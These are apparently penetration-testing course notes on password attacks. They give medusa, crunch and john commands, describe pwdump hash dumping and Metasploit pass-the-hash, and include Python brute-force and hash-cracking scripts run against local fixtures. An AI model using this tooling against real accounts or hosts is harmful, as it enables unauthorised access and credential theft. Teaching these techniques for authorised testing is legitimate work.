G4G0-2/Penetration Testing/Week 23/Week 23 - Password Attacks.md
2025-03-16 18:59:42 +00:00

**Slide 1: Password Attacks**
- People are bad at remembering passwords, so they pick easy ones (e.g., `123456`) and reuse them across services.
- For a password chosen uniformly at random, entropy is length × log2(alphabet size): every extra character adds a fixed number of bits, while widening the alphabet (upper/lowercase, digits, symbols) adds bits only logarithmically, so length matters more than character mix. Human-chosen passwords have far less entropy than this bound because they are not uniform.
- Using password managers and multi-factor authentication is recommended.
**Slide 2: Real-World Password Attacks**
- The most common attacks target weak or default user and system passwords.
- Brute-force and dictionary attacks are common; tools like `medusa` and `ncrack` automate them against network services.
- Online password attacks guess against a live networked service (HTTP, SSH, FTP, SNMP, RDP); they are throttled by the network and by lockout policies, and every attempt is visible in the target's logs.
- Offline password attacks work on captured password hashes (e.g., `/etc/shadow` or a SAM dump) with tools like `john` (John the Ripper), limited only by local compute.
- Key-space brute force enumerates every string of a given length over a chosen character set; the space is |charset|^length.
- Social engineering and shoulder-surfing can also be used.
**Slide 3: Online Password Attacks Example**
- Example of an HTTP brute-force attack using `medusa` against a protected web directory.
- Command: `medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/npttest -t 10 -s`
- Flags: `-M http` selects the HTTP module and `-m DIR:/npttest` gives it the protected directory; `-t 10` runs ten login attempts in parallel (`-T` sets the number of hosts tested concurrently, which is not what you want against a single target); `-s` uses SSL/TLS.
- Lessons: be suspicious when the very first password in the list succeeds (check that the target was not staged), and when setting up demos don't put the correct password at the top of the list.
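The online attack above, end to end, as an added example that is not part of the slides: a local HTTP server protecting `/npttest` with Basic authentication stands in for the target (the credential `admin:sunshine` and the five-word list standing in for rockyou.txt are constructed fixtures), and the client does what `medusa -M http -m DIR:/npttest` does, one credential per request until a 200 comes back. The correct password is deliberately not first in the list.

```python
"""Online password attack against an HTTP Basic-auth protected directory.

Added example, not from the slides: spins up a local server that protects
/npttest with Basic authentication (constructed fixture) and brute-forces
it one candidate per request, stopping at the first 200.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed fixture: the "victim" server's protected path and credential.
PROTECTED_DIR = "/npttest"
VALID_USER, VALID_PASS = "admin", "sunshine"


class ProtectedDirHandler(BaseHTTPRequestHandler):
    """Serves /npttest only to clients presenting the right Basic credentials."""

    def do_GET(self):
        if not self.path.startswith(PROTECTED_DIR):
            self.send_error(404)
            return
        expected = base64.b64encode(f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization") == f"Basic {expected}":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"secret listing\n")
        else:
            # Wrong or missing credentials: challenge again, exactly what a
            # brute-forcer keys on (anything but 200 is a failed guess).
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="npttest"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet; a real target would log every attempt


def start_server():
    """Bind an ephemeral localhost port and serve from a background thread."""
    server = HTTPServer(("127.0.0.1", 0), ProtectedDirHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(host, port, path, user, password):
    """One guess: send Basic credentials and report whether the server accepted them."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn.request("GET", path, headers={"Authorization": f"Basic {token}"})
    status = conn.getresponse().status
    conn.close()
    return status == 200


def brute_force_dir(host, port, path, user, wordlist):
    """Dictionary attack over the wire: returns (password, attempts) or (None, attempts)."""
    for attempts, candidate in enumerate(wordlist, start=1):
        if try_login(host, port, path, user, candidate):
            return candidate, attempts
    return None, len(wordlist)


# Constructed mini wordlist standing in for rockyou.txt; the real password is
# not first, per the slide's lesson about staged demos.
WORDLIST = ["123456", "password", "qwerty", "sunshine", "letmein"]


def demo(wordlist=WORDLIST):
    """Start the fixture server, run the attack against it, and tear it down."""
    server = start_server()
    try:
        host, port = server.server_address
        return brute_force_dir(host, port, PROTECTED_DIR, VALID_USER, wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())  # ('sunshine', 4)
```

Each guess is a full HTTP round trip, which is why online attacks are slow compared with offline cracking and why the `-t` parallelism flag exists; it is also why the target's access log ends up with one 401 per wrong guess.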
**Slide 4: Key Space Brute-Force**
- `crunch` tool generates custom wordlists with defined character sets and password formats.
- Example: `crunch 6 6 0123456789ABCDEF -o test.txt` writes every 6-character hexadecimal string: 16^6 = 16,777,216 candidates, about 112 MiB on disk including newlines.
- The key space grows exponentially, |charset|^length, so a slightly longer password or a wider character set quickly makes exhaustive generation and cracking impractical.
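Sizing the key space before generating it, as an added example that is not part of the slides or of `crunch` itself. It covers both the entropy point from Slide 1 (bits = length × log2(|charset|)) and the `crunch 6 6 0123456789ABCDEF` example from this slide, and generalizes to any charset and length range: `keyspace_size` counts candidates, `wordlist_bytes` gives the size of the file crunch would write, `seconds_to_exhaust` estimates worst-case time at an assumed guess rate, and `generate` yields candidates in the same order crunch does. The guess rate in the demo is an assumption, not a benchmark.

```python
"""Key-space brute force: count and size the space before generating it.

Added example (not the slides' or crunch's code): a crunch-style generator
plus the arithmetic that tells you whether a run is feasible.
"""
import itertools
import math


def keyspace_size(charset, min_len, max_len):
    """Number of strings of length min_len..max_len over charset: sum of |charset|^L."""
    n = len(charset)
    return sum(n ** length for length in range(min_len, max_len + 1))


def entropy_bits(charset, length):
    """Entropy of a password chosen uniformly from charset^length: L * log2(|charset|)."""
    return length * math.log2(len(charset))


def wordlist_bytes(charset, min_len, max_len):
    """Bytes crunch writes: each candidate plus a newline (single-byte charset assumed)."""
    n = len(charset)
    return sum(n ** length * (length + 1) for length in range(min_len, max_len + 1))


def seconds_to_exhaust(charset, min_len, max_len, guesses_per_second):
    """Worst-case time to try every candidate at an assumed cracking rate."""
    return keyspace_size(charset, min_len, max_len) / guesses_per_second


def generate(charset, min_len, max_len):
    """Yield every candidate, shortest length first, lexicographic in charset order
    (the order crunch emits them)."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


if __name__ == "__main__":
    HEX = "0123456789ABCDEF"
    PRINTABLE = "".join(chr(c) for c in range(33, 127))  # 94 printable ASCII
    RATE = 1e9  # assumed guesses/second for a fast unsalted hash on a GPU

    # The slide's example: crunch 6 6 0123456789ABCDEF -o test.txt
    print(keyspace_size(HEX, 6, 6))            # 16777216 candidates
    print(wordlist_bytes(HEX, 6, 6) // 2**20)  # 112 MiB on disk
    print(entropy_bits(HEX, 6))                # 24.0 bits
    print(next(generate(HEX, 6, 6)))           # 000000

    # Why length wins: each step is the same charset, two characters longer.
    for length in (6, 8, 10, 12):
        secs = seconds_to_exhaust(PRINTABLE, length, length, RATE)
        print(f"{length} printable chars: {entropy_bits(PRINTABLE, length):.1f} bits, "
              f"{secs / 86400:.1f} days at {RATE:.0e} guesses/s")
```

Run the sizing functions first and generate only when the numbers are sane; a 6-character hex list is 112 MiB, but the same call over all printable ASCII at length 8 would be several petabytes, which is the point of the "quickly becomes unmanageable" bullet.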
**Slide 5: John the Ripper Offline Cracking Tool**
- `john` has an automatic mode (single-crack, then wordlist with rules, then incremental brute force), a dictionary mode driven by a wordlist, and mangling rules that derive variants of each word (case changes, appended digits and years, character substitutions).
- Example commands:
- Automatic mode: `john <password-file>`
- Dictionary mode: `john --wordlist=/usr/share/wordlists/rockyou.txt <password-file>`
- Mangling rules: `john --rules --wordlist=/usr/share/wordlists/rockyou.txt <password-file>`
- Show results: `john --show <password-file>` (cracked passwords are kept in `~/.john/john.pot`, so a re-run skips hashes already cracked)
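What `--rules --wordlist=...` is doing under the hood, as an added example that is neither the slides' nor John the Ripper's code. The hash file (`user:sha256hex`, unsalted) is a constructed fixture built from known plaintexts so the run is self-checking; the six-word list stands in for rockyou.txt, and the rules are a small hand-picked subset of the kind john's default wordlist ruleset applies. One target is deliberately not derivable from the list, to show what "uncracked" looks like.

```python
"""Offline dictionary attack with mangling rules.

Added example, not from the slides and not john's code: mirrors the idea
behind `john --rules --wordlist=<list> <password-file>` against a
constructed user:sha256hex hash file.
"""
import hashlib

# Constructed plaintexts; in a real engagement only the hashes are available.
_PLAINTEXTS = {
    "alice": "sunshine",     # plain dictionary word
    "bob": "Password1",      # capitalise + append digit
    "carol": "dr4g0n",       # leetspeak substitution
    "dave": "letmein2023",   # append a year
    "eve": "Tr0ub4dor&3",    # not derivable from the list: stays uncracked
}
HASH_FILE = "\n".join(
    f"{user}:{hashlib.sha256(pw.encode()).hexdigest()}" for user, pw in _PLAINTEXTS.items()
)

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "sunshine", "dragon", "letmein", "qwerty"]

LEET = str.maketrans("aeios", "43105")


def mangle(word):
    """Yield the word and its rule variants, cheapest rules first."""
    yield word
    yield word.capitalize()
    yield word.upper()
    yield word[::-1]
    yield word.translate(LEET)
    for suffix in ("1", "123", "!", "2023", "2024"):
        yield word + suffix
        yield word.capitalize() + suffix


def parse_hash_file(text):
    """Parse user:hash lines into {hash: [users]}; identical hashes share one plaintext."""
    targets = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        targets.setdefault(digest.strip().lower(), []).append(user.strip())
    return targets


def crack(hash_text, wordlist):
    """Return ({user: password}, {uncracked users}).

    Because the hashes are unsalted, each candidate is hashed once and looked
    up against every remaining target; a salted or slow hash (bcrypt, yescrypt)
    would force one hash computation per target per candidate.
    """
    targets = parse_hash_file(hash_text)
    cracked = {}
    for word in wordlist:
        for candidate in mangle(word):
            users = targets.pop(hashlib.sha256(candidate.encode()).hexdigest(), None)
            if users:
                for user in users:
                    cracked[user] = candidate
            if not targets:
                return cracked, set()  # everything cracked: stop early
    return cracked, {u for users in targets.values() for u in users}


if __name__ == "__main__":
    found, missing = crack(HASH_FILE, WORDLIST)
    for user, pw in found.items():
        print(f"{user}:{pw}")
    print("uncracked:", sorted(missing))
```

Four of the five hashes fall to a six-word list only because rules multiply each word into a dozen candidates; the fifth survives because no rule reaches it, which is the cue to move from dictionary mode to incremental (key-space) mode or a bigger list.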
**Slide 6: In-memory Attacks**
- Abuse how the OS holds credentials in memory and on disk. This is particularly effective on Windows: local account hashes live in the SAM, credential material is held by LSASS, and the same local administrator password is often shared across many hosts, so one dumped hash can unlock all of them.
- `pwdump` dumps the SAM hashes (LM/NT) by injecting a DLL into the LSASS process; it needs administrative privileges on the host, and LSASS injection is exactly the behaviour modern endpoint defences alert on.
**Slide 7: Passing the Hash in Windows**
- Pass-the-Hash (PtH) authenticates with the NT hash instead of the password: NTLM challenge-response computes the response from the hash, never from the plaintext, so a dumped hash is as good as the password and nothing needs to be cracked.
- Metasploit's `exploit/windows/smb/psexec` with a reverse TCP Meterpreter payload performs PtH when `SMBPass` is set to the `LM:NT` hash pair instead of a plaintext password.
**Slide 8: Task 3 Password Attack**
- Demonstrate various password attacks using different tools.
- Target at least two protocols (e.g., HTTP, FTP, SSH, RDP).
- Crack the provided offline password hashes using wordlists and `crunch`-generated key spaces.
- Crack the password-protected Word file `TradeSecret.docx`: extract the hash with `office2john` (or `zip2john` if the file turns out to be a plain zip archive) and feed it to `john`.
- Perform an in-memory attack: dump the hashes and use PtH to authenticate to the Windows XP system.